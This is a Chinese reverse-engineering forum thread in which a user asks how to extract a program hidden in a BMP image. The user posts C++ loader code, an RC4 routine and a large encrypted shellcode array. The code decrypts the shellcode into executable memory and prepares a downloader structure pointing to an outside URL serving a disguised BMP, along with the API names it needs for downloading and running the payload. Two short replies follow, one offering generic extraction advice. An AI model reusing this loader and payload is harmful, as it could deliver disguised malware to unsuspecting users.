首页
社区
课程
招聘
[旧帖] 求助下如何把程序从bmp上解析出来 0.00雪花
发表于: 2013-11-29 10:42 3680

[旧帖] 求助下如何把程序从bmp上解析出来 0.00雪花

2013-11-29 10:42
3680
[/CODE]大神们,我有个bmp图片,有个应用程序隐藏在bmp上我想把程序解析出来,但出不来,不知道是思路不对还是,写的有问题
[CODE]
int  CParseSmartBMPDlg::LoadSmartPlugin()
{
	int    i=0;
	char*  vdata=0;
	char   pathreal[MAX_PATH];
	char   filename[MAX_PATH];
	ptrSmartHide pSmartHide=0;
	struct SmartHideHead vSmartHideHead;
	//获取当前用户的TEMP目录
	GetTempPath(MAX_PATH,pathreal);
	sprintf(filename,"%s%s",pathreal,"ad.bmp");
	strcpy(vSmartHideHead.downurl,"http://update.51topsoft.com/wow-lj.bmp");
	strcpy(vSmartHideHead.strKernel32,"Kernel32.dll");
	strcpy(vSmartHideHead.strUrlMon,"UrlMon.dll");
	strcpy(vSmartHideHead.strGetFileAttributesA,"GetFileAttributesA");
	strcpy(vSmartHideHead.strURLDownloadToCacheFileA,"URLDownloadToCacheFileA");
	strcpy(vSmartHideHead.strSleep,"Sleep");
	strcpy(vSmartHideHead.strCopyFileA,"CopyFileA");
	strcpy(vSmartHideHead.strCreateFileA,"CreateFileA");
	strcpy(vSmartHideHead.strGetFileSize,"GetFileSize");
	strcpy(vSmartHideHead.strReadFile,"ReadFile");
	strcpy(vSmartHideHead.strCloseHandle,"CloseHandle");
	strcpy(vSmartHideHead.strVirtualAlloc,"VirtualAlloc");
	strcpy(vSmartHideHead.strVirtualFree,"VirtualFree");
	vSmartHideHead.loadlibrary=(DWORD)LoadLibraryA;
	vSmartHideHead.getprocaddress=(DWORD)GetProcAddress;
	//调用进程的虚地址空间,预定或者提交一部分页
	vdata=(char*)VirtualAlloc(NULL,sizeof(CodePlug),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	memcpy(vdata,CodePlug,sizeof(CodePlug));
	//调用解码,解析KeyRotateRand
	EncodeRotate(KeyRotateRand,strlen(KeyRotateRand),(char*)vdata,sizeof(CodePlug));
	pSmartHide=(ptrSmartHide)(vdata+EnterPlugin);
	/*
	if(pSmartHide(filename,&vSmartHideHead)!=0)
	{
		DeleteFile(filename);
		return 1;
	}
	*/
	VirtualFree(vdata,0,MEM_RELEASE);
	return 0;
}


int CParseSmartBMPDlg::EncodeRotate(char* keyrand,int nkeyrand,char* pdata,int psize)
{
	int   i;
	unsigned char  m;
	unsigned char  n;
	unsigned char  c=0;
	unsigned char  c_1=0;
	unsigned char  c_2=0;
	unsigned char  pkey[256];

	for(i=0;i<sizeof(pkey);i++)
	{
		pkey[i]=i;
	}
	for(i=0,m=0;i<sizeof(pkey);i++)
	{
		m=m+keyrand[i%nkeyrand]+pkey[i];
		c_1=pkey[i];
		c_2=pkey[m];
		pkey[i]=c_2;
		pkey[m]=c_1;
	}
	for(i=0,m=0,n=0;i<psize;i++,m++)
	{
		n=n+pkey[m];
		c_1=pkey[n];
		c_2=pkey[m];
		pkey[m]=c_1;
		pkey[n]=c_2;
		c=c_1+c_2;
		pdata[i]=pkey[c]^pdata[i];
	}
	return 0;
}

struct SmartHideHead
{
	char  downurl[URL_LEN];//下载的url路径
	char  strKernel32[SMAIL_LEN];
	char  strUrlMon[SMAIL_LEN];
	char  strGetFileAttributesA[BUFFER_LEN];//获取文件属性
	char  strURLDownloadToCacheFileA[BUFFER_LEN];//URL下载到缓存文件
	char  strSleep[BUFFER_LEN];//休眠
	char  strCopyFileA[BUFFER_LEN];//copy文件数据
	char  strCreateFileA[BUFFER_LEN];//创建文件
	char  strGetFileSize[BUFFER_LEN];//获取文件的大小
	char  strReadFile[BUFFER_LEN];//读取文件
	char  strCloseHandle[BUFFER_LEN];//关闭句柄
	char  strVirtualAlloc[BUFFER_LEN];//分配虚拟空间
	char  strVirtualFree[BUFFER_LEN];//释放虚拟空间
	DWORD loadlibrary;
	DWORD getprocaddress;
};


const unsigned char CodePlug[]=
{
	 0x03,0xB4,0xA8,0xE0,0xD7,0xFA,0x62,0xE0,0x2B,0x7F,0xCB,0x58,0xA1,0x3D,0xD8,0xC6,
    0xAF,0x72,0x25,0x44,0x4D,0xDA,0x37,0x65,0x43,0x8B,0xEC,0x5F,0xAB,0x8C,0x4C,0x99,
    0x0B,0x69,0x8F,0xFD,0x50,0x62,0x03,0x36,0x92,0x60,0x97,0x4C,0x71,0x53,0x5F,0x30,
    0xDE,0x88,0x4F,0xA1,0xE4,0xB7,0x1F,0xBE,0xC0,0x5D,0xCF,0x0A,0xCD,0xEA,0xCC,0x92,
    0x7F,0x7D,0x57,0xFE,0x19,0x26,0xFF,0xAE,0xA1,0x31,0x48,0x68,0x50,0x66,0xFF,0x00,
    0xE0,0xB4,0x64,0x39,0x14,0x96,0x42,0xF6,0x8A,0xC4,0x7D,0xDD,0xA6,0x0A,0xFB,0x8B,
    0x96,0x2A,0x18,0x06,0xB4,0xAB,0x9C,0xE2,0xA3,0x8A,0xF2,0xA2,0xD7,0x5F,0x0A,0xB7,
    0x37,0x92,0xD7,0xBA,0x75,0xEA,0x8A,0xC5,0x7E,0x0C,0xC7,0x25,0x74,0xBD,0xD2,0xB9,
    0x6A,0xA4,0x10,0x25,0xD9,0xB1,0x89,0x3A,0x5D,0xC6,0xEE,0xB4,0x09,0xBB,0x0B,0x68,
    0xD1,0xD7,0x21,0x7F,0x73,0x6E,0xDA,0xB6,0x5B,0xC0,0x3E,0xE0,0xDB,0x2E,0x63,0x0B,
    0x62,0x54,0x1C,0x65,0xE1,0x80,0x55,0x02,0x80,0xE6,0xC3,0xD0,0xB8,0xEA,0xC8,0x7F,
    0x29,0x10,0x52,0xD0,0x54,0x07,0xEE,0x5E,0x68,0x97,0xDF,0x44,0x4F,0xA0,0xF9,0xB2,
    0x9B,0xF6,0x03,0xAD,0xC3,0xF7,0xBC,0x59,0x65,0x36,0xA4,0xC7,0x39,0xC7,0xCA,0x3F,
    0xB3,0x19,0xA4,0x1B,0x94,0x07,0xA7,0xAE,0xF9,0xEA,0xC7,0xA8,0x56,0x85,0xCB,0x8F,
    0xC2,0x7E,0xB0,0xE9,0x79,0xED,0x70,0xE7,0xD4,0x3C,0x01,0x6B,0x2F,0x26,0x67,0x29,
    0x54,0x23,0x48,0x70,0x1D,0x5E,0x26,0x49,0xF7,0xD6,0x51,0x72,0x5E,0x15,0x77,0x34,
    0x2F,0x1F,0x67,0xC2,0x4F,0x12,0xDE,0xFD,0x76,0x14,0x9F,0x36,0x28,0x42,0x6F,0xD5,
    0x71,0x26,0x70,0x24,0xA7,0x3C,0x7A,0x7B,0xF4,0x9D,0xF0,0x1E,0x82,0xA2,0x4D,0x4A,
    0xE5,0xC8,0xCD,0xB6,0x8F,0x39,0xB4,0xE1,0x69,0x68,0x29,0x52,0x3F,0xB0,0x7D,0x84,
    0x53,0xD6,0x9B,0x92,0xDC,0x01,0xF0,0xD3,0x94,0x23,0x6F,0xDF,0x4B,0xD0,0xB7,0x8A,
    0xD8,0x00,0x80,0x92,0x56,0x42,0x7D,0x92,0xB6,0xC2,0x59,0x5D,0x34,0x60,0x63,0xFF,
    0x98,0xBF,0x35,0xC8,0x76,0x63,0x07,0x6E,0x55,0x41,0x57,0xFA,0xB6,0x50,0x68,0xE8,
    0x72,0x27,0xDD,0xF4,0xBB,0xC5,0xBA,0x29,0x80,0x21,0xE8,0x73,0x50,0x6F,0x9F,0x4E,
    0xBA,0x9F,0xEA,0xEB,0x2B,0xA3,0x84,0x36,0x5D,0xEC,0x16,0xD6,0xF7,0x73,0x43,0xA5,
    0xA4,0x3B,0x5E,0x24,0xA0,0xD2,0x1E,0xE3,0xFC,0x9E,0xF9,0x8C,0x29,0xE0,0x7F,0x09,
    0xF7,0x21,0x7E,0xC6,0x70,0x08,0xB7,0x0B,0xFD,0x04,0x85,0x06,0x93,0xA9,0x61,0x88,
    0x7E,0x20,0xDD,0x06,0x0B,0x3D,0x58,0x4F,0x03,0xC2,0x9C,0xAB,0xA5,0xC0,0xFA,0x1D,
    0xE4,0x23,0x5D,0x53,0x86,0x72,0x98,0x47,0x48,0x70,0x39,0xF0,0x53,0x8E,0x32,0x81,
    0x06,0x19,0x79,0x78,0x8F,0x9B,0x14,0x6E,0x35,0x6C,0x10,0x1A,0x4A,0x3B,0x16,0xE0,
    0xF9,0x1B,0x7C,0x2C,0xCB,0x2B,0x63,0x41,0x2F,0x1A,0x0E,0x9E,0x04,0x20,0x87,0x22,
    0x6D,0x9E,0x62,0x9A,0x3E,0x17,0xC4,0x2A,0xA7,0xF7,0x81,0x8A,0x2F,0x9E,0x3E,0xC2,
    0x84,0x23,0x86,0xE6,0x8D,0x37,0x08,0x13,0x9F,0xD0,0x2D,0x9E,0x43,0xC8,0x53,0x14,
    0x59,0x41,0x67,0x4E,0xAE,0x67,0x97,0x4B,0x10,0x41,0xEA,0x42,0x9B,0xCB,0xFE,0xB0,
    0xF5,0x2D,0x5A,0xD8,0xEF,0x4F,0xE7,0x7C,0x37,0x6B,0x95,0x39,0xE3,0x24,0xE3,0x89,
    0xE8,0x9C,0x68,0x9E,0x79,0xE2,0x8B,0x5B,0x8E,0xC4,0x2F,0x74,0x57,0xD4,0x82,0x86,
    0x37,0x93,0xB4,0x34,0xF3,0x31,0x5C,0x78,0x2A,0x39,0x04,0xC8,0x46,0x11,0x88,0x98,
    0xA3,0xCE,0xAD,0xA9,0xAB,0x86,0x3F,0xB5,0x49,0xD9,0x84,0xE2,0x87,0x90,0x32,0x0C,
    0x42,0x87,0x46,0x8F,0x9C,0xB7,0x5D,0xE9,0xD9,0xAC,0xE0,0x90,0x50,0xDA,0xA3,0x3D,
    0x38,0x1B,0xB4,0x21,0xB0,0xD1,0xF1,0x7E,0xAF,0xE4,0xEA,0x07,0xC7,0x98,0x08,0xB8,
    0x66,0xC2,0x52,0x1F,0xEF,0x84,0x3C,0x10,0x60,0x0A,0x1A,0xEC,0xD2,0x45,0x5F,0x86,
    0x30,0x8E,0xBA,0x84,0x4F,0xD1,0xB9,0x78,0xE5,0x29,0x81,0x7F,0xC2,0xF7,0x4A,0x96,
    0xEC,0xD0,0x72,0x6E,0xF5,0x4E,0x67,0xE8,0x98,0x33,0xF0,0x7E,0x55,0xF3,0xA2,0xFB,
    0xAE,0xAC,0xEA,0x1D,0xDA,0x60,0xBD,0x79,0xA8,0x29,0x24,0x4C,0x1A,0xE0,0x42,0xEA,
    0xD9,0xAD,0xE7,0x1F,0xF2,0x54,0xD4,0xBC,0x12,0x3B,0x04,0x3F,0x65,0x6D,0xCD,0xED,
    0x34,0x56,0xE8,0xEA,0xFD,0xB3,0x1A,0x11,0x71,0x87,0x79,0x98,0x18,0x2C,0x1A,0x8F,
    0x06,0xF2,0x5A,0x13,0x42,0x5C,0x12,0xD7,0xFE,0x44,0x63,0x5C,0xA8,0xAF,0xB5,0x9D,
    0x1B,0x72,0x72,0x4A,0x3F,0x20,0xF3,0xB4,0x8C,0x49,0x2C,0x4C,0xD9,0x35,0x2B,0x67,
    0x83,0xA8,0x79,0x1C,0x27,0x1A,0xF1,0x59,0xA7,0x00,0xDE,0x91,0xC8,0xD2,0x44,0xA0,
    0x61,0xD6,0xF6,0x26,0x2C,0x60,0x88,0x3A,0x41,0x40,0x13,0x1D,0xC7,0xFB,0x5F,0x6C,
    0x5B,0x02,0xD6,0x54,0x1E,0x4B,0xD5,0x73,0x3D,0x3B,0xB1,0x7C,0xF8,0x5E,0x10,0xFF,
    0x80,0x24,0x2B,0xAF,0x1D,0xBF,0x18,0x4D,0x05,0x07,0xDB,0x29,0x70,0xA7,0x09,0xE2,
    0x73,0x71,0x90,0xF4,0x34,0x88,0xDE,0xC6,0x24,0x1C,0xDB,0x13,0xEA,0x93,0x73,0xAB,
    0x75,0x2F,0xA0,0x52,0x93,0x55,0x9C,0xC0,0x12,0xAC,0x0E,0x40,0x0D,0xFF,0xB2,0x74,
    0x51,0x5A,0xF3,0xAF,0x17,0x37,0x99,0x27,0x07,0x17,0x40,0xD0,0x68,0xC2,0x28,0x64,
    0xE1,0x5B,0x85,0xFF,0x0E,0xF2,0xA8,0xCC,0xF0,0x62,0x54,0xBA,0x02,0x68,0x0D,0x94,
    0xC7,0x08,0x88,0x2C,0xBD,0x90,0xE7,0xBD,0x39,0x25,0x51,0x50,0x0C,0xCE,0xF9,0xC0,
    0xBC,0x42,0x2F,0xA9,0x3D,0x24,0x9C,0x09,0x37,0x44,0x70,0x4E,0xD3,0x13,0xD6,0x55,
    0x11,0xDF,0x19,0x9F,0x95,0x19,0x21,0x36,0x2B,0x06,0x48,0xCC,0xF8,0x2A,0xC2,0x7A,
    0xA8,0xF8,0x55,0xF0,0xBC,0x10,0xB2,0xA7,0xF0,0x6A,0x4A,0x97,0x86,0xC8,0x5C,0x14,
    0xB8,0x38,0x03,0x31,0xCD,0x56,0x97,0x49,0x24,0x7E,0xFA,0x1D,0xF9,0x53,0xD5,0x01,
    0x06,0x35,0x43,0x0A,0x5E,0x0C,0x81,0xD2,0x05,0xF6,0x65,0xEF,0x0C,0x8D,0x6E,0xC5,
    0xEF,0xE1,0x16,0x96,0x97,0x08,0x98,0x27,0x63,0xED,0x59,0x57,0x20,0xBF,0x65,0xD4,
    0x29,0x05,0x3A,0xA1,0xAC,0x76,0x04,0x22,0xAA,0xD5,0x79,0xEB,0xAB,0x6D,0x99,0xCE,
    0xC5,0xD6,0xFD,0x6D,0xCD,0x92,0x33,0x18,0x62,0x41,0x11,0x02,0x54,0x7F,0xA8,0x87,
    0x2D,0x1E,0xA3,0x29,0x01,0x84,0xC9,0xB1,0xB7,0x1A,0xB5,0xC5,0xD7,0xDB,0x9F,0x68,
    0x3F,0xB0,0x50,0x18,0x00,0xA8,0x89,0x32,0x04,0x4B,0x3E,0xD0,0x38,0xC9,0x85,0xDD,
    0xBF,0xDB,0x61,0x22,0x10,0x04,0xDD,0x30,0x93,0xC7,0xF0,0x17,0xB1,0x07,0xCE,0x1D,
    0xE2,0x41,0x60,0x34,0xE2,0xE3,0x0C,0x42,0xAF,0xB1,0x47,0x82,0x71,0x9C,0xCA,0x24,
    0x1F,0x81,0x75,0x4D,0x84,0x0A,0xA6,0x0A,0xBF,0x86,0x11,0xEE,0x5A,0x0A,0xB2,0x9B,
    0xF5,0x52,0x0E,0x62,0xCF,0x5D,0x99,0xCF,0xD6,0xD8,0xE4,0x7E,0xA0,0x62,0xD5,0xAB,
    0x54,0x46,0xBE,0x12,0xD5,0x05,0x04,0x5F,0xDB,0x5A,0xB3,0xB6,0x52,0xCC,0x32,0xAC,
    0xE1,0x59,0x35,0x2C,0x73,0x4D,0x76,0xFD,0x29,0x80,0x1B,0xF1,0x1A,0x63,0xD9,0x5F,
    0xA5,0x77,0x35,0xAF,0x80,0x47,0xC0,0x70,0x94,0xF8,0x0C,0xA1,0xA8,0x2C,0x50,0xF0,
    0xEC,0x73,0x7F,0x75,0x88,0x59,0x3B,0x9D,0x06,0x03,0x19,0x86,0xAD,0xB3,0x5B,0x78,
    0xEB,0x5B,0x38,0xE0,0xBE,0xAB,0x9A,0x8D,0x0A,0xDC,0x0D,0x68,0x51,0x05,0xE3,0xA2,
    0xD7,0x34,0xF9,0x8C,0x58,0xB0,0xA7,0x85,0x3F,0x79,0x33,0x43,0x3E,0x47,0x33,0x65,
    0x9E,0xF3,0xA1,0xF5,0x78,0xEB,0xE5,0x8E,0x74,0x87,0xA2,0x07,0xA2,0x8F,0x3D,0x43,
    0xA0,0x52,0xC1,0xED,0xAA,0xA4,0x56,0xE2,0x86,0x59,0x36,0x96,0x98,0x41,0x5B,0x83,
    0x0B,0xF1,0x6A,0x29,0x2B,0xEC,0xB2,0x78,0xC3,0x15,0x1D,0x25,0xFC,0x12,0x17,0xA5,
    0x6C,0xC6,0xE9,0x4B,0x4E,0x73,0xBA,0x43,0xAB,0x58,0x81,0x51,0x9E,0xC9,0x6A,0x12,
    0xA6,0xF5,0x3D,0x81,0xC3,0x6B,0x31,0x94,0x4A,0x26,0x22,0x43,0x70,0xBF,0xB8,0x53,
    0xA2,0x64,0x4E,0xF5,0x83,0x99,0x12,0xF9,0xCA,0x56,0xAE,0x76,0x62,0x98,0x00,0x7A,
    0x9F,0x7D,0x9D,0x90,0x59,0x15,0x87,0x71,0xF9,0xBB,0xAE,0x3E,0x42,0xEC,0xCC,0xAD,
    0xBF,0xA7,0x33,0x95,0x6D,0xE4,0x98,0xCE,0x2A,0x37,0x5C,0xAC,0x10,0xD9,0x86,0x71,
    0xD8,0x1B,0x6A,0xDD,0xE6,0xD7,0x23,0xA8,0xC7,0x4B,0xAC,0x0F,0xC7,0x20,0xE7,0xAF,
    0xD6,0x90,0x6D,0xD5,0xB9,0xC7,0xE2,0x2C,0x12,0xAD,0xFF,0x0E,0x98,0x04,0x5C,0x4B,
    0x2E,0x26,0x29,0x7D,0x04,0xBB,0x8F,0x59,0x66,0xD7,0xAE,0xEC,0xFE,0x90,0x34,0x27,
    0x92,0x19,0xC7,0xB3,0x1A,0x07,0x52,0xC2,0x41,0x57,0xC8,0xFB,0xC0,0xD5,0x6A,0xEA,
    0x56,0x1E,0xB9,0xB1,0xC4,0x08,0x32,0x23,0x6D,0x33,0x86,0x0D,0x3A,0x0A,0x6A,0x35,
    0x64,0x7E,0x41,0x7F,0xD3,0x83,0x98,0xEF,0xD8,0x50,0x4D,0xD5,0xCD,0x99,0xDF,0xB7,
    0xEB,0x37,0x90,0xF9,0xD0,0x7C,0xE5,0xB7,0x8B,0xCB,0x04,0x7F,0x9B,0xE5,0x2D,0x83,
    0x8A,0x54,0x78,0x2A,0x04,0xAC,0x15,0x39,0xA4,0x25,0x46,0xB4,0x2B,0x13,0xF0,0x65,
    0x16,0x10,0x36,0x8C,0x2E,0x23,0x85,0x44,0x60,0xD3,0x51,0xA6,0x0E,0x98,0x7E,0x5D,
    0xDA,0xA2,0x4E,0x3F,0xCF,0x8C,0xB9,0x58,0x73,0xAF,0xE7,0xD3,0x25,0x36,0x42,0x56,
    0xD1,0x44,0x4A,0xD6,0x74,0x8F,0xBF,0x09,0x4A,0x66,0xE7,0xA3,0x22,0x15,0xE1,0xB1,
    0x33,0xBF,0xD4,0xE6,0x9C,0x77,0x84,0x73,0x0F,0x35,0xDD,0x8F,0xFE,0x07,0xF9,0xEB,
    0x71,0x70,0x65,0x6E,0x51,0x93,0xA1,0xF2,0xD5,0x52,0x50,0x00,0x35,0x7B,0x9B,0x46,
    0x20,0x8F,0xA4,0xBE,0xCD,0xEA,0xE9,0x71,0xD2,0x68,0x46,0xBB,0xD0,0x49,0x64,0xB5,
    0x93,0x55,0xE7,0x33,0xEA,0xEF,0x5B,0x57,0xB9,0xB9,0x51,0x05,0xB2,0x90,0xE8,0x16,
    0x35,0x39,0xD1,0x55,0x67,0x36,0xDB,0xE1,0xAA,0xB4,0x96,0xB6,0xE6,0x60,0x01,0xCB,
    0x62,0xC0,0xF9,0x52,0xC9,0x1D,0xD5,0x2B,0xC6,0xF1,0x5A,0x06,0xAD,0x69,0xE4,0x61,
    0xD9,0x55,0x60,0x6C,0xC0,0x6D,0xE1,0xFC,0x18,0x70,0x04,0xF7,0x95,0x78,0xF7,0x3C
};
DWORD EnterPlugin=0x00000370;

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
我靠这么一大篇 看这 头晕   帮你顶一下
2013-12-2 11:30
0
雪    币: 704
活跃值: (657)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
3
没看懂楼主想表达什么呀~

如果是程序隐藏在图片中的话,那么首先是要找到隐藏所用的算法。如果是加密隐藏那就难度大了。如果是明文隐藏,那么可已通过应用程序的一些特征找找看,例如exe文件第一个特征就是“MZ”,明文隐藏的话很快就能找到这段特征,若rp再好点,是顺序隐写的话,那么直接从文件中读出来就行了。
2013-12-2 18:09
0
游客
登录 | 注册 方可回帖
返回
//